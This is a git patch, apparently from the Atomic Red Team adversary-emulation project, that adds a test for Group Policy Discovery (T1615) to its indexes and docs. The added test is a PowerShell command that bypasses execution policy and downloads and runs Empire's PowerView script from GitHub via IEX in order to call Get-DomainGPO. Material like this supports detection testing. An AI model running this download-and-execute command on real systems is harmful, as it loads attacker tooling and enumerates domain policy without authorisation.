From 059297cef55d205de1b653b2c04a196d40e4cb5d Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Tue, 26 Apr 2022 21:42:55 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 11 +++++++
 atomics/T1615/T1615.md                        | 30 +++++++++++++++++++
 6 files changed, 45 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f31c8557..1b761e90 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -870,6 +870,7 @@ discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
+discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 4161ea34..7012fcde 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -605,6 +605,7 @@ discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd
 discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
+discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3d2b65a9..c4989d1c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1390,6 +1390,7 @@
   - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
   - Atomic Test #1: Display group policy information via gpresult [windows]
+  - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #1: Enumerate all accounts (Local) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index f0f4f52f..636c40c5 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1002,6 +1002,7 @@
   - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
   - Atomic Test #1: Display group policy information via gpresult [windows]
+  - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e6cba7ed..b313d820 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -59123,6 +59123,17 @@ discovery:
         command: 'gpresult /z
 
           '
+    - name: Get-DomainGPO to display group policy information via PowerView
+      auto_generated_guid: 4e524c4e-0e02-49aa-8df5-93f3f7959b9f
+      description: Use PowerView to Get-DomainGPO This will only work on Windows 10
+        Enterprise and A DC Windows 2019.
+      supported_platforms:
+      - windows
+      executor:
+        command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1');
+          Get-DomainGPO"
+        name: powershell
+        elevation_required: true
   T1016.001:
     technique:
       object_marking_refs:
diff --git a/atomics/T1615/T1615.md b/atomics/T1615/T1615.md
index 4e3c43ba..ad99860f 100644
--- a/atomics/T1615/T1615.md
+++ b/atomics/T1615/T1615.md
@@ -8,6 +8,8 @@ Adversaries may use commands such as <code>gpresult</code> or various publicly a
 
 - [Atomic Test #1 - Display group policy information via gpresult](#atomic-test-1---display-group-policy-information-via-gpresult)
 
+- [Atomic Test #2 - Get-DomainGPO to display group policy information via PowerView](#atomic-test-2---get-domaingpo-to-display-group-policy-information-via-powerview)
+
 
 <br/>
 
@@ -40,4 +42,32 @@ gpresult /z
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Get-DomainGPO to display group policy information via PowerView
+Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4e524c4e-0e02-49aa-8df5-93f3f7959b9f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
+```
+
+
+
+
+
+
 <br/>